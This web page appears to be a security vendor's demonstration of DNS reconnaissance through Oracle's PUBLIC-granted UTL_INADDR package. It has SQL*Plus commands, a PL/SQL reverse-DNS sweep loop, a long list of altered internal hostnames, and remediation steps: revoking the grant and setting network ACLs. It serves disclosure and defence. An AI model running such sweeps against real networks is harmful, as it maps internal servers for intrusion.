Oracle UTL_INADDR Exploit
Versions 8.1.7 - 19.3

Overview
An Oracle Database hasn't been a "database" since version 6 or 7 depending on your point-of-view. It was back in the days when dinosaurs still roamed the earth, mainframe people like some of us here, that Oracle began adding value to what had previously been only a database and turning into a rich, fully function, application development and hosting platform. One of those additions is a built-in PL/SQL packaged named UTL_INADDR that can be used to interrogate both internal and external DNS resources to identify targets to attack.

What makes UTL_INADDR uniquely dangerous is that it is already installed inside the most secure zone of your firewall and is a trusted resource. Adding to that trusted ownership and location is the fact that, by default, Oracle grants execute on this package to PUBLIC. To execute the demo on this page no privilege is required beyond CREATE SESSION which is the lowest level privilege with the database.

When an internal database call is made it will appear to most monitoring applications as having been made by the database owner "oracle" not by the person that executing the action. And, given the lack of knowledge about databases on security teams why would a call to UTL_INADDR cause anyone to even look up, after all, they are monitoring for SQL*Injection attacks or other activities they are familiar with.

The demo is best viewed as a case where any user that has a valid userid and password can connect to the database with a command-line tool. Finally,If you are concerned as you review this posting that "real" information was published on this website don't be. The information has been altered in a manner that fully protects the organizations and we have received their permission to publish it in this form.
 
Exploit Demo
Let's start by creating a database user with the least possible privilege: CREATE SESSION.

SQL> conn / as sysdba
Connected.

SQL> CREATE user c##abc IDENTIFIED BY abc;

User Created.

SQL> GRANT create session TO c##abc;

Grant succeeded.

Now let's look at what this essentially unprivileged user can access.

SQL> conn c##abc/abc
Connected.

SQL> SELECT object_type, COUNT(*)
  2  FROM all_objects
  3  GROUP BY object_type
  4  ORDER BY 1;

OBJECT_TYPE          COUNT(*)
------------------- --------
CONSUMER GROUP             2
DESTINATION                2
EDITION                    1
EVALUATION CONTEXT         1
FUNCTION                 269
INDEX                    111
INDEXTYPE                 11
JAVA CLASS             37436
JAVA RESOURCE           1715
JOB CLASS                  2
LOCKDOWN PROFILE           3
OPERATOR                  59
PACKAGE                  414
PROCEDURE                 27
PROGRAM                    1
SCHEDULE                   4
SCHEDULER GROUP            4
SEQUENCE                  10
SYNONYM                12121
TABLE                    133
TABLE PARTITION            1
TYPE                    1864
VIEW                    1951
WINDOW                     9
XML SCHEMA                43

In my current Oracle 18.3 database my totally unprivileged user gains some form of access to more than 56,000 objects.
This is, by definition, minimum privileges ... access to 37,436 Java Classes ... what could possibly go wrong?
But we need to focus on the 414 packages because they are very powerful and many are well documented.

And, as you can see below, our new user has access because the EXECUTE privilege is granted, at install, to PUBLIC.


SQL> SELECT owner, object_type
  2  FROM all_objects
  3  WHERE object_name = 'UTL_INADDR';

OWNER  OBJECT_TYPE
------ ------------
SYS    PACKAGE
PUBLIC SYNONYM

SQL> SELECT grantee, privilege
  2  FROM all_tab_privs
  3  WHERE table_name = 'UTL_INADDR';

GRANTEE  PRIVILEGE
-------- ----------
PUBLIC   EXECUTE

The following demonstration, performed on the public internet, shows how dangerous this capability can be
if deployed from an Oracle Database that is inside your firewall and has access to NTP, DNS, network devices,
storage arrays, application servers, and probably a large number of other database servers.

For this demo to work you should be connected to the internet with a wireless connection (because we don't
want you to lose your job doing it from inside your organization's network) and assumes that the target of
the demo has not moved to IPV6 addressing and has not tightened their security (they were notified over a year ago).

SQL> show user
USER is "ABC"

SQL> SELECT utl_inaddr.get_host_address('www.xyz.com') FROM dual;

UTL_INADDR.GET_HOST_ADDRESS('WWW.XYZ.COM')
-------------------------------------------
127.84.159.77

We now have the IP address of a server. Let's turn it into a server name.

SQL> SELECT utl_inaddr.get_host_name('127.84.159.77')FROM dual;

UTL_INADDR.GET_HOST_NAME('127.84.159.77')
------------------------------------------
www-v.oit.xyz.com

And with a few lines of PL/SQL we can check every related IP address between .1 and .255

DECLARE
 h_name VARCHAR2(60);
 test_ip VARCHAR2(12) := '127.84.159.';
 suffixn NUMBER(3) := 0;
 suffixv VARCHAR2(4);
BEGIN
  FOR i IN 1 .. 255 LOOP
    suffixn := suffixn + 1;
    IF suffixn < 10 THEN
      suffixv := '00' || TO_CHAR(suffixn);
    ELSIF suffixn BETWEEN 10 and 99 THEN
      suffixv := '0' || TO_CHAR(suffixn);
    ELSE
      suffixv := TO_CHAR(suffixn);
    END IF;
    BEGIN
      SELECT utl_inaddr.get_host_name(test_ip || suffixv)
      INTO h_name
      FROM dual;
      dbms_output.put_line(test_ip || suffixv || ' - ' || h_name);
    EXCEPTION
      WHEN OTHERS THEN
        NULL;
    END;
  END LOOP;
END;
/

Generating the following output

127.84.159.001 - cms.csom.xyz.com
127.84.159.002 - www.lib.xyz.com
127.84.159.003 - axway-outbound-proxy.oit.xyz.com
127.84.159.004 - futuregopher.xyz.com
127.84.159.005 - wwwstage.lib.xyz.com
127.84.159.006 - kronos-p.oit.xyz.com
127.84.159.007 - entkronos.oit.xyz.com
127.84.159.010 - ldap-v.oit.xyz.com
127.84.159.011 - ldapauth-v.oit.xyz.com
127.84.159.012 - appd-cap-tst.oit.xyz.com
127.84.159.013 - ttus.oit.xyz.com
127.84.159.014 - idp3-test-v.shib.xyz.com
127.84.159.015 - prd.cap.oit.xyz.com
127.84.159.016 - qa.cap.oit.xyz.com
127.84.159.017 - wwwgoldpass.oit.xyz.com
127.84.159.020 - www-temp.tc.xyz.com
127.84.159.021 - tst.delegations.xyz.com
127.84.159.022 - oit-oim-web-lb.micah.oit.xyz.com
127.84.159.023 - edw.oit.xyz.com
127.84.159.024 - uachievetfo-dev.oit.xyz.com
127.84.159.025 - 2019.umcf.xyz.com
127.84.159.026 - oit-lbc-ltmatt-750.oit.xyz.com
127.84.159.027 - prd.delegations.xyz.com
127.84.159.030 - bionet.oit.xyz.com
127.84.159.031 - finance.oit.xyz.com
127.84.159.032 - tfraportal.uservices.xyz.com
127.84.159.033 - ltmmgd-outbound-proxy-snat.oit.xyz.com
127.84.159.034 - lb-f5-vs1.oit.xyz.com
127.84.159.035 - engage-test.oit.xyz.com
127.84.159.036 - cehdvision2020-web.oit.xyz.com
127.84.159.037 - conner.xyz.com
127.84.159.040 - pds.oit.xyz.com
127.84.159.041 - plan.oit.xyz.com
127.84.159.042 - wwwplan.oit.xyz.com
127.84.159.043 - search-assets.xyz.com
127.84.159.044 - prepaid.oit.xyz.com
127.84.159.045 - mncamh.oit.xyz.com
127.84.159.046 - lpt-testing.oit.xyz.com
127.84.159.047 - umedia-new-lib.oit.xyz.com
127.84.159.050 - wwwdem.oit.xyz.com
127.84.159.051 - umreports-lb.oit.xyz.com
127.84.159.052 - mkey.oit.xyz.com
127.84.159.053 - google-lb.oit.xyz.com
127.84.159.054 - prod-umreports-old.oit.xyz.com
127.84.159.055 - 2016test.umreports.xyz.com
127.84.159.056 - oit-lbw-ltmauth-750.oit.xyz.com
127.84.159.057 - prod-umreports.oit.xyz.com
127.84.159.060 - csi.dev.psoft.xyz.com
127.84.159.061 - controller.oit.xyz.com
127.84.159.062 - designcenter-new.oit.xyz.com
127.84.159.063 - wwwhhh.oit.xyz.com
127.84.159.064 - hhh.oit.xyz.com
127.84.159.065 - scholarship.oit.xyz.com
127.84.159.066 - scholarship-test.oit.xyz.com
127.84.159.067 - gis.uspatial.uservices.xyz.com
127.84.159.070 - smtp.oit.xyz.com
127.84.159.071 - epro-qat-old.eresearch.xyz.com
127.84.159.072 - designhigh-new.oit.xyz.com
127.84.159.073 - design-n-new.oit.xyz.com
127.84.159.074 - travel.oit.xyz.com
127.84.159.075 - design-n.oit.xyz.com
127.84.159.076 - oib.oit.xyz.com
127.84.159.077 - dha-c-new.oit.xyz.com
127.84.159.100 - oit-lb-ltmauth-750-float.oit.xyz.com
127.84.159.101 - egms-ent2.oit.xyz.com
127.84.159.102 - hokanson-new.oit.xyz.com
127.84.159.103 - gopherpoints.oit.xyz.com
127.84.159.104 - trakbook.oit.xyz.com
127.84.159.105 - ay15.tst.moodle.oit.xyz.com
127.84.159.106 - work.csom.xyz.com
127.84.159.107 - oit-lb-ltmtest-750-float.oit.xyz.com
127.84.159.108 - finsys.oit.xyz.com
127.84.159.109 - media2.law.oit.xyz.com
127.84.159.110 - rrc.oit.xyz.com
127.84.159.111 - egms-tst2.oit.xyz.com
127.84.159.112 - wwwtest.oit.xyz.com
127.84.159.113 - www.oit.xyz.com
127.84.159.114 - oit-lb.oit.xyz.com
127.84.159.115 - uachievetfo-qat.oit.xyz.com
127.84.159.116 - ay15.moodle.xyz.com
127.84.159.117 - netfiles-tst.oit.xyz.com
127.84.159.118 - stem-projects.oit.xyz.com
127.84.159.119 - search-lb.oit.xyz.com
127.84.159.120 - humanfactors-new.oit.xyz.com
127.84.159.121 - mediahub-test.oit.xyz.com
127.84.159.122 - identity-new.oit.xyz.com
127.84.159.123 - mediahub.oit.xyz.com
127.84.159.124 - landarch-c-new.oit.xyz.com
127.84.159.125 - ccc-test.oit.xyz.com
127.84.159.126 - oit-lb-ltmatt-750-float.oit.xyz.com
127.84.159.127 - tfauth-ldap-v.oit.xyz.com
127.84.159.128 - prd.eresearch.xyz.com
127.84.159.127 - ps-proxy.oit.xyz.com
127.84.159.130 - prdegms.oit.xyz.com
127.84.159.131 - oncoretraining.oit.xyz.com
127.84.159.132 - a.oit.xyz.com
127.84.159.133 - ecrt-tst.eresearch.xyz.com
127.84.159.127 - ecrt-ent.eresearch.xyz.com
127.84.159.135 - cle-test.oit.xyz.com
127.84.159.136 - ecrt-trn.eresearch.xyz.com
127.84.159.137 - webapps-prd.oit.xyz.com
127.84.159.138 - landarch-n-new.oit.xyz.com
127.84.159.139 - fmresident-database.oit.xyz.com
127.84.159.140 - systemstatus.oit.xyz.com
127.84.159.141 - portcities-new.oit.xyz.com
127.84.159.142 - rp-new.oit.xyz.com
127.84.159.143 - shift-new.oit.xyz.com
127.84.159.144 - scep-test.oit.xyz.com
127.84.159.145 - stage2-new.oit.xyz.com
127.84.159.146 - it.oit.xyz.com
127.84.159.147 - x500test-v-lb.oit.xyz.com
127.84.159.148 - tpdbcrest.oit.xyz.com
127.84.159.149 - wwwtest-v-lb.oit.xyz.com
127.84.159.150 - cle.oit.xyz.com
127.84.159.151 - gis.uservices.xyz.com
127.84.159.152 - pharmd.oit.xyz.com
127.84.159.153 - uachievetfo-tst.oit.xyz.com
127.84.159.154 - worldheritage-c-new.oit.xyz.com
127.84.159.155 - fsi.tst.psoft.xyz.com
127.84.159.156 - csi.tst.psoft.xyz.com
127.84.159.157 - cle-new.oit.xyz.com
127.84.159.158 - umarket.xyz.com
127.84.159.159 - ici-docker-dev.oit.xyz.com
127.84.159.160 - shib-load-f5.oit.xyz.com
127.84.159.161 - egms-prd2.oit.xyz.com
127.84.159.162 - ftp-proxy-tkunz.oit.xyz.com
127.84.159.163 - oit-jsstest.oit.xyz.com
127.84.159.164 - ihcg-myu.oit.xyz.com
127.84.159.165 - envoy-old.oit.xyz.com
127.84.159.166 - stacks.oit.xyz.com
127.84.159.167 - canvas-lti-prd.oit.xyz.com
127.84.159.168 - cs-myu.oit.xyz.com
127.84.159.169 - dwtst.xyz.com
127.84.159.170 - appd-cap-dev-green.oit.xyz.com
127.84.159.171 - sirc-ent.eresearch.xyz.com
127.84.159.172 - ay16.qa.moodle.oit.xyz.com
127.84.159.173 - shib-prod-v.oit.xyz.com
127.84.159.174 - oit-oim-web-lb2.oit.xyz.com
127.84.159.175 - public-umanalytics.xyz.com
127.84.159.176 - ici-docker-prd.oit.xyz.com
127.84.159.177 - umanalytics.oit.xyz.com
127.84.159.178 - ccc.oit.xyz.com
127.84.159.179 - apps.lib.xyz.com
127.84.159.180 - fs-myu.oit.xyz.com
127.84.159.181 - hr-myu.oit.xyz.com
127.84.159.182 - esup-myu.oit.xyz.com
127.84.159.183 - umaps.oit.xyz.com
127.84.159.184 - hri.dev.psoft.xyz.com
127.84.159.185 - zoom.xyz.com
127.84.159.186 - studentserv.oit.xyz.com
127.84.159.187 - tst.cap.oit.xyz.com
127.84.159.188 - pilot.cap.oit.xyz.com
127.84.159.189 - itprem.oit.xyz.com
127.84.159.190 - appd-cap-prd.oit.xyz.com
127.84.159.191 - csi-qat-psoft.oit.xyz.com
127.84.159.192 - fsi-qat-psoft.oit.xyz.com
127.84.159.193 - hri.tst.psoft.xyz.com
127.84.159.194 - ay14.moodle.xyz.com
127.84.159.195 - hri.qat.psoft.xyz.com
127.84.159.196 - whost.oit.xyz.com
127.84.159.197 - whost2.oit.xyz.com
127.84.159.198 - whost3.oit.xyz.com
127.84.159.199 - gmail-dev.oit.xyz.com
127.84.159.200 - gmail-test.oit.xyz.com
127.84.159.201 - glogin-dev.oit.xyz.com
127.84.159.202 - glogin-test.oit.xyz.com
127.84.159.203 - test.statefair.oit.xyz.com
127.84.159.204 - devel.meded.oit.xyz.com
127.84.159.205 - eprotocol.oit.xyz.com
127.84.159.206 - gmail-prod.oit.xyz.com
127.84.159.207 - glogin-prod.oit.xyz.com
127.84.159.208 - design-n-test.oit.xyz.com
127.84.159.209 - excellence.oit.xyz.com
127.84.159.210 - oit-lbw-ltmatt-750.oit.xyz.com
127.84.159.211 - private.zoom.xyz.com
127.84.159.212 - ctrl-test.oit.xyz.com
127.84.159.213 - test.search-lb.oit.xyz.com
127.84.159.214 - dmc.xyz.com
127.84.159.215 - umedia-new.oit.xyz.com
127.84.159.216 - dev-old-orig.oim.xyz.com
127.84.159.217 - appd-cap-dev.oit.xyz.com
127.84.159.218 - trn.ras.oit.xyz.com
127.84.159.219 - ay16.tst.moodle.oit.xyz.com
127.84.159.220 - test.m.oit.xyz.com
127.84.159.221 - admissions-new.tc.xyz.com
127.84.159.222 - oit-lbw-ltmps-750.oit.xyz.com
127.84.159.223 - oit-lbc-ltmps-750.oit.xyz.com
127.84.159.224 - oit-lb-ltmps-750-float.oit.xyz.com
127.84.159.225 - oit-lbw-ltmmgd-750.oit.xyz.com
127.84.159.226 - oit-lbc-ltmmgd-750.oit.xyz.com
127.84.159.227 - oit-lb-ltmmgd-750-float.oit.xyz.com
127.84.159.228 - x-127-84-159-228.oit.xyz.com
127.84.159.229 - oit-splunk-prd-shc-lb.oit.xyz.com
127.84.159.230 - x-127-84-159-230.oit.xyz.com
127.84.159.231 - x-127-84-159-231.oit.xyz.com
127.84.159.232 - x-127-84-159-232.oit.xyz.com
127.84.159.233 - x-127-84-159-233.oit.xyz.com
127.84.159.234 - x-127-84-159-234.oit.xyz.com
127.84.159.235 - moodle2-lb.oit.xyz.com
127.84.159.236 - myu-lb.oit.xyz.com
127.84.159.237 - netfiles-lb.oit.xyz.com
127.84.159.238 - electrophysworkgroup.oit.xyz.com
127.84.159.239 - myu-test.oit.xyz.com
127.84.159.240 - ay13.moodle.xyz.com
127.84.159.241 - boxoffice-lb.oit.xyz.com
127.84.159.242 - avstage-lb.oit.xyz.com
127.84.159.243 - avreports-lb.oit.xyz.com
127.84.159.244 - avtest-lb.oit.xyz.com
127.84.159.245 - minnesotamasternaturalist.oit.xyz.com
127.84.159.246 - pay.oit.xyz.com
127.84.159.247 - cal-prod.oit.xyz.com
127.84.159.248 - dlp-reader-test.oit.xyz.com
127.84.159.249 - grouper-v.oit.xyz.com
127.84.159.250 - dgis.uservices.xyz.com
127.84.159.251 - dlp-reader-ssl.oit.xyz.com
127.84.159.252 - infotech-dc-01-v750.ggnet.xyz.com
127.84.159.253 - telecomb-dc-01-v750.ggnet.xyz.com
127.84.159.254 - datacenter-dc-01-v750.ggnet.xyz.com

How much have you learned about this organization if you were an attacker?
And we only highlighted a few of those that are problematic.
Not a single one of these needed to be exposed to the internet to be fully functional.

And we will gladly accept bets on whether all of the PSOFT servers are running PeopleSoft financials or HR.

Again, what is your risk if this capability was utilized from behind your firewall?

Here is a short list of some of some of the worst naming we have seen while teaching organizations how to protect themselves along with our guesses as to what they host.


127.76.032.052 - blv-sec-cert-rp.abcd.com   - Bellevue data center security certifications
127.76.032.075 - dhcp17a.bcde.com           - DHCP server
127.76.032.103 - bcag-fwal-01.cdef.com      - Firewall
127.76.184.106 - phxntpx1.ntp.defg.net      - Phoenix data center NTP server ... with a copper wire to everything
127.76.184.212 - phxdnsxp01.dns.ghij.net    - Phoenix data center DNS server ... with a copper wire to everything
127.84.119.025 - g-smtp-w.tc.xyz.edu        - SMTP
127.84.119.036 - ldapauth-w.tc.xyz.com      - LDAP ... with a copper wire to almost everything
127.97.136.111 - sql-om.it.rstu.edu         - SQL Server database ... it contained both PII and PHI
127.97.137.106 - people.mnop.com            - PII information
127.97.137.104 - jira.sys.qrst.net          - Support tickets ... containing systems with bugs and credentials
127.97.137.150 - umailx.umail.uvwh.org      - Email

Our guesses may be wrong ... but if we were contractors or vendors about to go onsite this information could save a lot of time identifying targets.

There is no excuse for making it this easy for the bad guys.
 
Oracle Database Remediation
SQL> conn / as sysdba
Connected.

SQL> REVOKE execute ON utl_inaddr FROM PUBLIC;

That is all it takes to eliminate this threat originating from an Oracle Database.

If you need UTL_INADDR for an application ... explicitly grant EXECUTE to the schema.

If you are terrified by the thought of disabling a grant to PUBLIC follow Oracle's instruction on creating a Network Access Control List.
Conclusion
Oracle has an reason for not revoking the grant to public: Backward compatibility. Organizations that continue to name servers based on their location and functionality, and even worse expose that information to the internet have no mitigating factors. Doing so is a demonstration of a lack of thought about security.

There were a number of separate issues exposed in this exploit.
  • Naming servers in a way that betrays their location and/or functionality
  • Exposing internal physical servers to the Internet which persists their name and address in core DNS
  • Not creating appropriate rules in their firewalls
  • Not revoking unnecessary grants of EXECUTE to PUBLIC in the Oracle Database
  • Not creating an appropriate Network Access Control list in the database to block internet access
If you are an Oracle customer, and have now become aware of this threat what action are you going to take to eliminate it from your environment?

Related Topics
DBMS_NETWORK_ACL_ADMIN
DBMS_NETWORK_ACL_UTILITY
Exception Handling